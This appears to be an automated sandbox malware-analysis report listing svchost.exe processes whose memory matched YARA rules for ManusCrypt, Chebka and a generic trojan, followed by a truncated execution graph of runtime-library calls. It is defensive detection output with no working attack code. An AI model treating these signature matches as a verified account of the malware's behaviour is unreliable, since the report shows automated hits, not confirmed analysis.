                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001F.00000002.801510749.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001F.00000002.801510749.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001F.00000002.801510749.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                                                            Target ID:33
                                                                                            Start time:11:03:22
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000021.00000003.380766591.000001E554180000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000021.00000003.380766591.000001E554180000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000021.00000003.380766591.000001E554180000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000021.00000000.387328234.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000021.00000000.387328234.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000021.00000000.387328234.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000021.00000000.387328234.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000021.00000002.801814113.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000021.00000002.801814113.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000021.00000002.801814113.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000021.00000002.801814113.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                                                            Target ID:34
                                                                                            Start time:11:03:28
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Themes
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000003.393309641.000001AF63730000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000022.00000003.393309641.000001AF63730000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000022.00000003.393309641.000001AF63730000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000000.394316156.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000022.00000000.394316156.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000022.00000000.394316156.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000022.00000000.394316156.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000002.799993059.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000022.00000002.799993059.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000022.00000002.799993059.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000022.00000002.799993059.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                                                            Target ID:35
                                                                                            Start time:11:03:30
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000023.00000003.398762048.0000023E49540000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000023.00000003.398762048.0000023E49540000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000023.00000003.398762048.0000023E49540000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000023.00000000.400180832.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000023.00000000.400180832.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000023.00000000.400180832.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000023.00000000.400180832.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000023.00000002.805719068.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000023.00000002.805719068.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000023.00000002.805719068.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000023.00000002.805719068.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                                                            Target ID:36
                                                                                            Start time:11:03:33
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000024.00000002.804697134.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000024.00000002.804697134.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000024.00000002.804697134.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000024.00000002.804697134.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000024.00000003.404982309.000001DD8FD40000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000024.00000003.404982309.000001DD8FD40000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000024.00000003.404982309.000001DD8FD40000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000024.00000000.407196014.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000024.00000000.407196014.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000024.00000000.407196014.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000024.00000000.407196014.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                                                            Target ID:37
                                                                                            Start time:11:03:36
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000003.421573587.000002828E550000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000025.00000003.421573587.000002828E550000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000025.00000003.421573587.000002828E550000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000000.434199481.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000025.00000000.434199481.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000025.00000000.434199481.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000025.00000000.434199481.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000002.820701644.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000025.00000002.820701644.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000025.00000002.820701644.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000025.00000002.820701644.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                                                            Target ID:41
                                                                                            Start time:11:03:49
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000029.00000003.441340256.000002B668080000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000029.00000003.441340256.000002B668080000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000029.00000003.441340256.000002B668080000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000029.00000002.746382396.000002B6680F0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000029.00000002.746382396.000002B6680F0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000029.00000002.746382396.000002B6680F0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000029.00000002.746382396.000002B6680F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000029.00000000.443207792.000002B6680F0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000029.00000000.443207792.000002B6680F0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000029.00000000.443207792.000002B6680F0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000029.00000000.443207792.000002B6680F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:4%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:12.2%
                                                                                              Total number of Nodes:1225
                                                                                              Total number of Limit Nodes:37
                                                                                              execution_graph 7833 40354c 7834 4035f9 7833->7834 7846 40355a 7833->7846 7835 403619 _malloc 5 API calls 7834->7835 7836 4035ff 7835->7836 7838 40233d __write_nolock 68 API calls 7836->7838 7837 404e3b __FF_MSGBANNER 68 API calls 7843 40356f 7837->7843 7839 403605 7838->7839 7840 404c9b __NMSG_WRITE 68 API calls 7840->7843 7841 4034fd _malloc 68 API calls 7841->7846 7842 4035bd RtlAllocateHeap 7842->7846 7843->7837 7843->7840 7844 4049dd _doexit 3 API calls 7843->7844 7843->7846 7844->7843 7845 4035f0 7846->7841 7846->7842 7846->7843 7846->7845 7847 4035e4 7846->7847 7848 403619 _malloc 5 API calls 7846->7848 7850 4035e2 7846->7850 7849 40233d __write_nolock 68 API calls 7847->7849 7848->7846 7849->7850 7851 40233d __write_nolock 68 API calls 7850->7851 7851->7845 7065 40ee90 7068 4011b7 LoadLibraryA 7065->7068 7071 401ceb 7068->7071 7070 4011f3 GetProcAddress 7072 401cf3 7071->7072 7073 401cf5 IsDebuggerPresent 7071->7073 7072->7070 7079 405d04 7073->7079 7076 4022c9 SetUnhandledExceptionFilter UnhandledExceptionFilter 7077 4022e6 __invoke_watson 7076->7077 7078 4022ee GetCurrentProcess TerminateProcess 7076->7078 7077->7078 7078->7070 7079->7076 7080 408baa 7081 408bb6 __msize 7080->7081 7082 408bd9 7081->7082 7083 408bbe 7081->7083 7085 408be7 7082->7085 7088 408c28 7082->7088 7178 402350 7083->7178 7087 402350 __write_nolock 69 API calls 7085->7087 7090 408bec 7087->7090 7105 40a063 7088->7105 7092 40233d __write_nolock 69 API calls 7090->7092 7094 408bf3 7092->7094 7093 408c2e 7095 408c51 7093->7095 7096 408c3b 7093->7096 7184 403b7b 7094->7184 7100 40233d __write_nolock 69 API calls 7095->7100 7115 4085e4 7096->7115 7098 408bcb __msize 7102 408c56 7100->7102 7101 408c49 7187 408c7c 7101->7187 7103 402350 __write_nolock 69 API calls 7102->7103 7103->7101 7106 40a06f __msize 7105->7106 7107 40a0ca 7106->7107 7190 4025ac 7106->7190 7108 40a0ec __msize 7107->7108 7109 40a0cf EnterCriticalSection 7107->7109 7108->7093 7109->7108 7111 40a09b 7112 40a0b2 7111->7112 7197 405d26 7111->7197 7210 40a0fa 7112->7210 7116 408620 7115->7116 7117 408619 7115->7117 7118 408624 7116->7118 7119 40864b 7116->7119 7121 401ceb __write_nolock 5 API calls 7117->7121 7120 402350 __write_nolock 69 API calls 7118->7120 7124 4086b5 7119->7124 7125 40868f 7119->7125 7122 408629 7120->7122 7123 408ba2 7121->7123 7128 40233d __write_nolock 69 API calls 7122->7128 7123->7101 7126 4086ca 7124->7126 7127 4086bb 7124->7127 7129 402350 __write_nolock 69 API calls 7125->7129 7500 406b39 7126->7500 7515 409650 7127->7515 7131 408630 7128->7131 7133 408694 7129->7133 7135 403b7b __write_nolock 5 API calls 7131->7135 7136 40233d __write_nolock 69 API calls 7133->7136 7135->7117 7138 40869d 7136->7138 7137 4088cf 7139 408b02 WriteFile 7137->7139 7140 4088dd 7137->7140 7142 403b7b __write_nolock 5 API calls 7138->7142 7144 408b29 GetLastError 7139->7144 7145 408a22 7139->7145 7143 408980 7140->7143 7151 4088ef 7140->7151 7141 4086d0 7141->7137 7510 4059b3 7141->7510 7142->7117 7155 40898a 7143->7155 7158 408a27 7143->7158 7148 4088ca 7144->7148 7145->7148 7147 408b63 7147->7117 7153 40233d __write_nolock 69 API calls 7147->7153 7148->7117 7148->7147 7160 408b43 7148->7160 7150 40870f 7150->7137 7154 40871d GetConsoleCP 7150->7154 7151->7147 7151->7148 7152 40893a WriteFile 7151->7152 7152->7144 7152->7151 7157 408b50 7153->7157 7154->7148 7173 40873d 7154->7173 7155->7147 7156 4089dd WriteFile 7155->7156 7156->7144 7164 408a02 7156->7164 7168 402350 __write_nolock 69 API calls 7157->7168 7158->7147 7159 408a7d WideCharToMultiByte 7158->7159 7159->7144 7163 408ab0 WriteFile 7159->7163 7161 408b58 7160->7161 7162 408b4b 7160->7162 7528 402363 7161->7528 7165 40233d __write_nolock 69 API calls 7162->7165 7166 408ade GetLastError 7163->7166 7170 408ad5 7163->7170 7164->7145 7164->7148 7164->7155 7165->7157 7166->7170 7168->7117 7170->7145 7170->7148 7170->7158 7170->7163 7171 409f5a 81 API calls __write_nolock 7171->7173 7172 4087b5 WideCharToMultiByte 7172->7148 7175 4087e3 WriteFile 7172->7175 7173->7148 7173->7171 7173->7172 7174 408804 7173->7174 7525 407888 7173->7525 7174->7144 7174->7148 7174->7173 7176 409d85 11 API calls __putwch_nolock 7174->7176 7177 40881c WriteFile 7174->7177 7175->7144 7175->7174 7176->7174 7177->7144 7177->7174 7179 405930 __getptd_noexit 69 API calls 7178->7179 7180 402355 7179->7180 7181 40233d 7180->7181 7182 405930 __getptd_noexit 69 API calls 7181->7182 7183 402342 7182->7183 7183->7098 7185 4057a9 __decode_pointer 5 API calls 7184->7185 7186 403b89 __invoke_watson 7185->7186 7832 40a103 LeaveCriticalSection 7187->7832 7189 408c84 7189->7098 7191 4025d2 EnterCriticalSection 7190->7191 7192 4025bf 7190->7192 7191->7111 7213 4024e9 7192->7213 7194 4025c5 7194->7191 7239 404993 7194->7239 7198 405d32 __msize 7197->7198 7199 4057a9 __decode_pointer 5 API calls 7198->7199 7200 405d42 7199->7200 7201 404a3c ___crtInitCritSecAndSpinCount 67 API calls 7200->7201 7206 405d96 __msize 7200->7206 7202 405d52 7201->7202 7203 403a7f __invoke_watson 10 API calls 7202->7203 7207 405d61 7202->7207 7203->7207 7204 405d6a GetModuleHandleA 7205 405d8b 7204->7205 7208 405d79 GetProcAddress 7204->7208 7209 40573d __encode_pointer 5 API calls 7205->7209 7206->7112 7207->7204 7207->7205 7208->7205 7209->7206 7499 4024d4 LeaveCriticalSection 7210->7499 7212 40a101 7212->7107 7214 4024f5 __msize 7213->7214 7215 40251b 7214->7215 7246 404e3b 7214->7246 7221 40252b __msize 7215->7221 7292 405deb 7215->7292 7221->7194 7222 402511 7289 4049dd 7222->7289 7223 40254c 7227 4025ac __lock 69 API calls 7223->7227 7224 40253d 7226 40233d __write_nolock 69 API calls 7224->7226 7226->7221 7228 402553 7227->7228 7229 402587 7228->7229 7230 40255b 7228->7230 7232 401cfa __freefls@4 69 API calls 7229->7232 7231 405d26 ___crtInitCritSecAndSpinCount 69 API calls 7230->7231 7233 402566 7231->7233 7234 402578 7232->7234 7233->7234 7297 401cfa 7233->7297 7310 4025a3 7234->7310 7237 402572 7238 40233d __write_nolock 69 API calls 7237->7238 7238->7234 7240 404e3b __FF_MSGBANNER 69 API calls 7239->7240 7241 404998 7240->7241 7242 404c9b __NMSG_WRITE 69 API calls 7241->7242 7243 4049a1 7242->7243 7244 4057a9 __decode_pointer 5 API calls 7243->7244 7245 4025d1 7244->7245 7245->7191 7313 407ea9 7246->7313 7248 404e42 7249 404e4f 7248->7249 7250 407ea9 __NMSG_WRITE 69 API calls 7248->7250 7251 404c9b __NMSG_WRITE 69 API calls 7249->7251 7253 40250a 7249->7253 7250->7249 7252 404e67 7251->7252 7254 404c9b __NMSG_WRITE 69 API calls 7252->7254 7255 404c9b 7253->7255 7254->7253 7256 404ca7 7255->7256 7257 407ea9 __NMSG_WRITE 66 API calls 7256->7257 7288 404dfd 7256->7288 7258 404cc7 7257->7258 7259 404e02 GetStdHandle 7258->7259 7261 407ea9 __NMSG_WRITE 66 API calls 7258->7261 7260 404e10 _strlen 7259->7260 7259->7288 7264 404e2a WriteFile 7260->7264 7260->7288 7262 404cd8 7261->7262 7262->7259 7263 404cea 7262->7263 7263->7288 7320 40645e 7263->7320 7264->7288 7267 404d20 GetModuleFileNameA 7269 404d3e 7267->7269 7273 404d61 _strlen 7267->7273 7271 40645e _strcpy_s 66 API calls 7269->7271 7272 404d4e 7271->7272 7272->7273 7274 403a7f __invoke_watson 10 API calls 7272->7274 7284 404da4 7273->7284 7336 407df6 7273->7336 7274->7273 7278 404dc8 7281 407d85 _strcat_s 66 API calls 7278->7281 7280 403a7f __invoke_watson 10 API calls 7280->7278 7283 404dd9 7281->7283 7282 403a7f __invoke_watson 10 API calls 7282->7284 7285 404dea 7283->7285 7287 403a7f __invoke_watson 10 API calls 7283->7287 7345 407d85 7284->7345 7354 407be7 7285->7354 7287->7285 7288->7222 7428 4049b7 GetModuleHandleA 7289->7428 7293 405def 7292->7293 7295 402536 7293->7295 7296 405e07 Sleep 7293->7296 7432 40354c 7293->7432 7295->7223 7295->7224 7296->7293 7299 401d06 __msize 7297->7299 7298 401d7f __dosmaperr __msize 7298->7237 7299->7298 7300 401d45 7299->7300 7302 4025ac __lock 67 API calls 7299->7302 7300->7298 7301 401d5a HeapFree 7300->7301 7301->7298 7303 401d6c 7301->7303 7306 401d1d ___sbh_find_block 7302->7306 7304 40233d __write_nolock 67 API calls 7303->7304 7305 401d71 GetLastError 7304->7305 7305->7298 7307 401d37 7306->7307 7483 402650 7306->7483 7490 401d50 7307->7490 7498 4024d4 LeaveCriticalSection 7310->7498 7312 4025aa 7312->7221 7314 407eb4 7313->7314 7315 40233d __write_nolock 69 API calls 7314->7315 7316 407ebe 7314->7316 7317 407ed7 7315->7317 7316->7248 7318 403b7b __write_nolock 5 API calls 7317->7318 7319 407ee7 7318->7319 7319->7248 7321 406473 7320->7321 7322 40646b 7320->7322 7323 40233d __write_nolock 69 API calls 7321->7323 7322->7321 7326 40649a 7322->7326 7328 406478 7323->7328 7324 403b7b __write_nolock 5 API calls 7325 404d0c 7324->7325 7325->7267 7329 403a7f 7325->7329 7326->7325 7327 40233d __write_nolock 69 API calls 7326->7327 7327->7328 7328->7324 7391 403690 7329->7391 7331 403b10 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7332 403b53 GetCurrentProcess TerminateProcess 7331->7332 7333 403b47 __invoke_watson 7331->7333 7334 401ceb __write_nolock 5 API calls 7332->7334 7333->7332 7335 403b73 7334->7335 7335->7267 7340 407e06 7336->7340 7337 407e0a 7338 404d91 7337->7338 7339 40233d __write_nolock 69 API calls 7337->7339 7338->7282 7338->7284 7344 407e26 7339->7344 7340->7337 7340->7338 7342 407e50 7340->7342 7341 403b7b __write_nolock 5 API calls 7341->7338 7342->7338 7343 40233d __write_nolock 69 API calls 7342->7343 7343->7344 7344->7341 7346 407d9a 7345->7346 7349 407d92 7345->7349 7347 40233d __write_nolock 69 API calls 7346->7347 7348 407d9f 7347->7348 7350 403b7b __write_nolock 5 API calls 7348->7350 7349->7346 7352 407dcf 7349->7352 7351 404db7 7350->7351 7351->7278 7351->7280 7352->7351 7353 40233d __write_nolock 69 API calls 7352->7353 7353->7348 7393 4057a0 7354->7393 7357 407c0f LoadLibraryA 7358 407c20 7357->7358 7359 407c27 GetProcAddress 7357->7359 7358->7288 7359->7358 7361 407c39 7359->7361 7360 407d35 7363 4057a9 __decode_pointer 5 API calls 7360->7363 7380 407d1a 7360->7380 7396 40573d TlsGetValue 7361->7396 7362 407cb6 7362->7360 7412 4057a9 TlsGetValue 7362->7412 7374 407d44 7363->7374 7365 4057a9 __decode_pointer 5 API calls 7365->7358 7369 40573d __encode_pointer 5 API calls 7370 407c54 GetProcAddress 7369->7370 7372 40573d __encode_pointer 5 API calls 7370->7372 7371 407d02 7421 404a73 7371->7421 7376 407c69 7372->7376 7373 4057a9 __decode_pointer 5 API calls 7386 407cf5 7373->7386 7377 4057a9 __decode_pointer 5 API calls 7374->7377 7374->7380 7405 404a3c 7376->7405 7377->7380 7378 407d0b 7378->7380 7381 403a7f __invoke_watson 10 API calls 7378->7381 7380->7365 7381->7380 7382 407c87 7382->7362 7385 407c90 GetProcAddress 7382->7385 7383 407c77 7383->7382 7384 403a7f __invoke_watson 10 API calls 7383->7384 7384->7382 7387 40573d __encode_pointer 5 API calls 7385->7387 7386->7360 7386->7371 7388 407c9e 7387->7388 7388->7362 7389 407ca8 GetProcAddress 7388->7389 7390 40573d __encode_pointer 5 API calls 7389->7390 7390->7362 7392 40369c __VEC_memzero 7391->7392 7392->7331 7394 40573d __encode_pointer 5 API calls 7393->7394 7395 4057a7 7394->7395 7395->7357 7395->7362 7397 405750 7396->7397 7398 405771 GetModuleHandleA 7396->7398 7397->7398 7399 40575a TlsGetValue 7397->7399 7400 405780 GetProcAddress 7398->7400 7401 40579a GetProcAddress 7398->7401 7404 405765 7399->7404 7402 405769 7400->7402 7401->7369 7402->7401 7403 405790 RtlEncodePointer 7402->7403 7403->7401 7404->7398 7404->7402 7406 404a47 7405->7406 7407 40233d __write_nolock 69 API calls 7406->7407 7408 404a6d 7406->7408 7409 404a4c 7407->7409 7408->7383 7410 403b7b __write_nolock 5 API calls 7409->7410 7411 404a5c 7410->7411 7411->7383 7413 4057bc 7412->7413 7414 4057dd GetModuleHandleA 7412->7414 7413->7414 7415 4057c6 TlsGetValue 